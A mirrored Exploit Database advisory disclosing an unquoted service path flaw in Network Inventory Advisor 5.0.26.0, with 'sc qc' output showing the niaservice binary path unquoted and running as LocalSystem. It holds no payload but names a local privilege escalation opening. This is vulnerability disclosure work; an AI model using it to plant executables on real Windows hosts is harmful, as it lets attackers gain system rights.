Network Inventory Advisor 5.0.26.0 – ‘niaservice’ Unquoted Service Path

• Exploit Database
• 16 阅读

• 作者： Samuel DiazL
  日期： 2019-11-05
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47584/

• # Exploit Title: Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path
  # Date: 2019-11-04
  # Exploit Author: Samuel DiazL
  # Vendor Homepage: https://www.network-inventory-advisor.com/
  # Software Link: https://www.network-inventory-advisor.com/download.html
  # Version: 5.0.26.0
  # Tested on: Microsoft Windows 10 Enterprise x64 ESP
  # CVE: N/A
  
  # Description:
  # Network Inventory Advisor installs niaservice as a service with an unquoted service path
  
  C:\Users\SD502812>sc qc niaservice
  [SC] QueryServiceConfig CORRECTO
  
  NOMBRE_SERVICIO: niaservice
  TIPO : 10WIN32_OWN_PROCESS
  TIPO_INICIO: 2 AUTO_START
  CONTROL_ERROR: 0 IGNORE
  NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ClearApps\Network Inventory Advisor\niaservice.exe
  GRUPO_ORDEN_CARGA:
  ETIQUETA : 0
  NOMBRE_MOSTRAR : Network Inventory Advisor Service by ClearApps Software
  DEPENDENCIAS :
  NOMBRE_INICIO_SERVICIO: LocalSystem